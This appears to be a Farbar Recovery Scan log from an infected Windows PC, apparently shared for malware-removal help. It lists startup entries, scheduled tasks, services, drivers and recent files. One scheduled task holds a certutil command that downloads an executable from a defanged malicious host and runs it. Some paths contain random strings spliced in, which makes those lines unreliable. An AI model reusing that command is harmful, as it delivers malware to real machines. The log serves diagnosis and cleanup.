HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [799904 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2778864 2014-08-06] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-08-27] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2109064 2019-11-27] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-11] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-01-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CCleaner Monitoring] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Policies\...\system: [disablecmd] 0
HKU\S-1-5-18\...\Run: [GarminExpress] => C:\Program Files (x86)\Garmin\Express\express.exe [30860272 2019-06-18] (Garmin International, Inc. -> Garmin Ltd. or its subsidiaries)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-23] (Google LLC -> Google LLC)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{ACFC407B-266C-8504-8DAE-F3E276336E4B}] -> C:\Windows\system32\AthCredentialProvider.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [182040 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [159480 2019-04-17] (NVIDIA Corporation-PE-Prod-Sha1 -> NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk [2019-05-12]
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {043F5EB4-82CE-46AA-BE56-7668C5C64C5E} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {0760CF23-E27C-42D7-9E44-6B3896E46166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://theatresearch.xyz/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {1DE2EE32-D3F2-49E9-A9B3-B3B665DC515B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {2D417548-BA65-4EE7-8774-0A7D26D81927} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {51CC2622-5A74-4047-8C6D-C3C3CC65EC8A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rvice.exe [335416 2020-01-21] (Adobe Inc. -> Adobe)
Task: {5C3781C4-8E63-4EE9-BD6E-23BD81C33BC9} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_321_Plugin.exe [1458232 2020-01-21] (Adobe Inc. -> Adobe)
Task: {905A300B-6470-42D2-87C0-0A406C62E55F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {973AEEE8-1D02-4786-946B-3A7611DB49FC} - System32\Tasks\HPCustPartic.exe_{497FF387-CFCE-4B3F-9361-4D1F864871FC} => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {A4CB1FE6-864E-4AC1-8079-C8F6B56E7208} - System32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {DD5C372A-1601-4F80-9BD1-91EBB6A059E8} - System1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E289981D-7DE7-44EA-8295-33A39EFCC113} - System1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-01-07] (Google Inc -> Google Inc.)
Task: {E6660E0C-2898-438C-92D1-1B9BC249F29E} - System32\Tasks\HPCustParticipation HP LaserJet MFP M28-M31 => C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPCustPartic.exe [6662792 2018-07-04] (Hewlett Packard -> HP Inc.)
Task: {EC032B4F-84FF-4698-AA3E-EB8CEC1F95CE} - System32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479\{XXIL7BBA-VLUN-1SE5-VAVW-AAH7L2DBI1PZ} => C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c\PortableDeviceClassExtension.exe [0 0000-00-00] (Windows Media Audio AEC for Media Foundation) (Access Denied)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 07 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8A644A86-7EBB-4639-9455-DF1016EC069A}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{FF69FF1A-22D7-4392-824F-9C30EFD876FD}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10463__191020
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
FireFox:
========
FF DefaultProfile: zzgehp0c.default-1579206376147
FF ProfilePath: C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiofiles\zzgehp0c.default-1579206376147 [2020-02-06]
FF Extension: (Adaware Secure Search) - C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\@newtab-omni.xpi [2019-10-20]
FF HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-01-20] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_321.dll [2020-01-21] (Adobe Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default [2020-01-26]
CHR Notifications: Default -> hxxps://www.youtube.com
CHR Extension: (Prezentácie) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-01-07]
CHR Extension: (SEOquake) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2020-01-08]
CHR Extension: (Dokumenty) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-01-08]
CHR Extension: (Disk Google) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-01-08]
CHR Extension: (YouTube) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-01-08]
CHR Extension: (Tabuľky) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-01-07]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-01-26]
CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2019-05-08]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-08]
CHR Extension: (Gmail) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-08]
CHR Extension: (Chrome Media Router) - C:\Users\Jomko\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <not found>
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-08-26] (Apple Inc. -> Apple Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [105120 2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
R2 ibtsiva; C:\Windows\system32\ibtsiva.exe [184072 2017-01-13] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [359680 2019-07-12] (Intel Corporation -> Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268968 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> )
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [5248312 2019-05-12] (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2017-01-08] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [2079744 2020-01-24] () [File not signed]
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3758760 2017-11-12] (Intel(R) Wireless Connectivity Solutions -> Intel® Corporation)
S2 Main Service; C:\Program Files (x86)\MachinerData\IdealDVDCopy.exe 1 [X]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\MobileGo\DriverInstall.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 amdhub30; C:\Windows\system32\drivers\amdhub30.sys [108768 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdhub31; C:\Windows\system32\drivers\amdhub31.sys [141528 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 amdxhc; C:\Windows\system32\drivers\amdxhc.sys [229088 2016-01-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, INC.)
S3 amdxhc31; C:\Windows\system32\drivers\amdxhc31.sys [440536 2016-02-26] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc.)
S3 ampa; C:\Windows\system32\ampa.sys [38320 2016-12-25] (CHENGDU AOMEI Tech Co., Ltd. -> )
R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [118184 2018-05-14] (Alcorlink Corp. -> )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [101352 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [158696 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1560552 2017-05-12] (Intel(R) Wireless Connectivity Solutions -> Motorola Solutions, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 EtronHub3; C:\Windows\System32\Drivers\EtronHub3.sys [65408 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [39296 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 EtronXHCI; C:\Windows\System32\Drivers\EtronXHCI.sys [94208 2014-02-12] (Microsoft Windows Hardware Compatibility Publisher -> Etron Technology Inc)
S3 FLxHCIh; C:\Windows\system32\drivers\FLxHCIh.sys [88016 2016-12-09] (Fresco Logic Inc -> Fresco Logic)
S3 IaNVMe; C:\Windows\system32\drivers\IaNVMe.sys [113160 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
R0 IaNVMeF; C:\Windows\System32\drivers\IaNVMeF.sys [35848 2016-11-04] (Intel(R) NVMe Windows Driver -> Intel Corporation)
S3 IaRNVMe; C:\Windows\system32\drivers\IaRNVMe.sys [592408 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R0 IaRNVMeF; C:\Windows\System32\drivers\IaRNVMeF.sys [36888 2016-01-22] (Intel(R) Rapid Storage Technology Enterprise -> Intel Corporation)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [206344 2017-06-27] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
R3 L1C; C:\Windows\System32\DRIVERS\L1C63x64.sys [125048 2016-01-29] (Rivet Networks LLC -> Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [199760 2016-11-29] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0061.sys [38088 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3427848 2017-11-08] (Intel(R) Wireless Connectivity Solutions -> Intel Corporation)
S3 ocznvme; C:\Windows\system32\drivers\ocznvme.sys [99592 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
R0 ocztrimfilter; C:\Windows\System32\drivers\ocztrimfilter.sys [29064 2016-06-10] (Toshiba America Electronic Components, Inc. -> TOSHIBA CORPORATION)
S3 rusb3hub; C:\Windows\system32\drivers\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
S3 rusb3xhc; C:\Windows\system32\drivers\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation -> Renesas Electronics Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [49864 2019-05-12] (SoftEther Corporation -> SoftEther Corporation)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [41512 2017-12-07] (Intel Corporation -> )
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [33008 2013-05-02] (Synaptics Incorporated -> Synaptics Incorporated)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 STHDA; C:\Windows\System32\DRIVERS\stwrt64.sys [551936 2013-08-16] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
S3 tilfilter; C:\Windows\system32\drivers\TIxHCIlfilter.sys [17672 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 tiufilter; C:\Windows\system32\drivers\TIxHCIufilter.sys [23304 2015-02-11] (Texas Instruments, Inc. -> Texas Instruments, Inc.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-02-01] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 VUSB3HUB; C:\Windows\system32\drivers\ViaHub3.sys [221696 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2020-01-22] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-01-25] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 xhcdrv; C:\Windows\system32\drivers\xhcdrv.sys [294912 2015-08-20] (Microsoft Windows Hardware Compatibility Publisher -> VIA Technologies, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 MBAMService; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-06 21:28 - 2020-02-06 21:29 - 000028881 _____ C:\Users\Jomko\Desktop\FRST.txt
2020-02-06 21:27 - 2020-02-06 21:23 - 002279424 _____ (Farbar) C:\Users\Jomko\Desktop\FRST64.exe
2020-02-06 21:24 - 2020-02-06 21:28 - 000000000 ____D C:\FRST
2020-02-06 20:58 - 2020-02-06 20:58 - 000000000 ___RD C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGiStart Menu\Programs\BT Devices
2020-01-26 19:07 - 2020-01-26 19:07 - 000077280 _____ (Bitvise Limited) C:\Windows\system32\BvEventSource.exe
2020-01-26 19:07 - 2020-01-26 19:07 - 000076336 _____ (Bitvise Limited) C:\Windows\MstscTitle64.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000069168 _____ (Bitvise Limited) C:\Windows\MstscTitle32.dll
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\Users\Public\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000002421 _____ C:\ProgramData\Desktop\Bitvise SSH Client.lnk
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Users\Jomko\AppData\Local\Bitvise
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitvise SSH Client
2020-01-26 19:07 - 2020-01-26 19:07 - 000000000 ____D C:\Program Files (x86)\Bitvise SSH Client
2020-01-26 15:54 - 2020-01-26 15:54 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Google
2020-01-25 00:49 - 2020-01-25 00:49 - 000000000 ____D C:\Windows\pss
2020-01-25 00:35 - 2020-01-25 00:35 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-01-25 00:24 - 2020-01-25 00:24 - 000003158 _____ C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
2020-01-25 00:22 - 2020-01-25 00:45 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-01-25 00:21 - 2020-01-25 00:21 - 000000000 ____D C:\Program Files\Malwarebytes
2020-01-24 21:58 - 2020-01-25 00:32 - 000000150 _____ C:\Windows\Reimage.ini
2020-01-24 21:56 - 2020-01-24 21:56 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\EpicNet Inc
2020-01-24 21:54 - 2020-01-24 21:54 - 000389624 _____ C:\Windows\Minidump\012420-10249-01.dmp
2020-01-22 23:59 - 2020-01-22 23:59 - 000001617 _____ C:\Users\Jomko\Desktop\Kodi.lnk
2020-01-22 23:07 - 2020-01-26 18:25 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kodi
2020-01-22 23:06 - 2020-01-22 23:06 - 000000000 ____D C:\Program Files\Kodi
2020-01-22 22:54 - 2020-01-24 21:00 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\vlc
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\Users\Public\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000840 _____ C:\ProgramData\Desktop\VLC media player.lnk
2020-01-22 22:51 - 2020-01-22 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-01-22 22:50 - 2020-01-22 22:50 - 000000000 ____D C:\Program Files\VideoLAN
2020-01-22 20:46 - 2020-01-22 20:47 - 000000000 ___SD C:\32788R22FWJFW
2020-01-22 20:28 - 2020-01-22 20:28 - 000034489 _____ C:\ComboFix.txt
2020-01-22 17:55 - 2020-01-22 20:47 - 000000000 ____D C:\Windows\erdnt
2020-01-22 17:29 - 2020-01-22 17:33 - 142164912 _____ (Microsoft Corporation) C:\Users\Jomko\Downloads\MSERT.exe
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\ProgramData\ESET
2020-01-22 17:20 - 2020-01-22 17:24 - 000000000 ____D C:\Program Files\ESET
2020-01-22 17:17 - 2020-01-22 17:17 - 005504960 _____ (ESET) C:\Users\Jomko\Downloads\eset_smart_security_premium_live_installer_rt_sk.exe
2020-01-22 15:00 - 2020-01-22 15:00 - 000335528 _____ C:\Windows\Minidump\012220-10062-01.dmp
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 __SHD C:\ProgramData\x86_microsoft-windows-d..directplay4-payload_31bf3856ad364e35_1.0.18362.1_none_148c99f79b506e6c
2020-01-22 14:31 - 2020-01-22 14:31 - 000000000 ____D C:\Windows\system32\Tasks\U-9-6-42-1263061080-1218707829-1038753275-4479
2020-01-22 14:30 - 2020-01-24 19:52 - 002079744 ____H C:\Windows\windefender.exe
2020-01-22 14:30 - 2020-01-22 14:30 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2020-01-22 14:30 - 2020-01-22 14:30 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2020-01-22 14:29 - 2020-02-06 20:58 - 000003496 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-22 14:29 - 2020-02-06 20:58 - 000003182 _____ C:\Windows\system32\Tasks\csrss
2020-01-22 14:29 - 2020-01-22 17:00 - 000000000 ___HD C:\Windows\rss
2020-01-22 14:29 - 2020-01-22 14:30 - 005553888 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-01-22 14:29 - 2020-01-22 14:30 - 000629984 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-01-22 14:28 - 2020-01-22 14:28 - 000000000 _____ C:\Users\Jomko\Documents\codec m3u vlc
2020-01-22 13:41 - 2020-01-22 14:25 - 000000150 _____ C:\Windows\restoro.ini
2020-01-22 12:39 - 2020-01-22 22:40 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-01-22 10:49 - 2020-01-22 14:41 - 000000000 ____D C:\Program Files\Mozilla Firefox
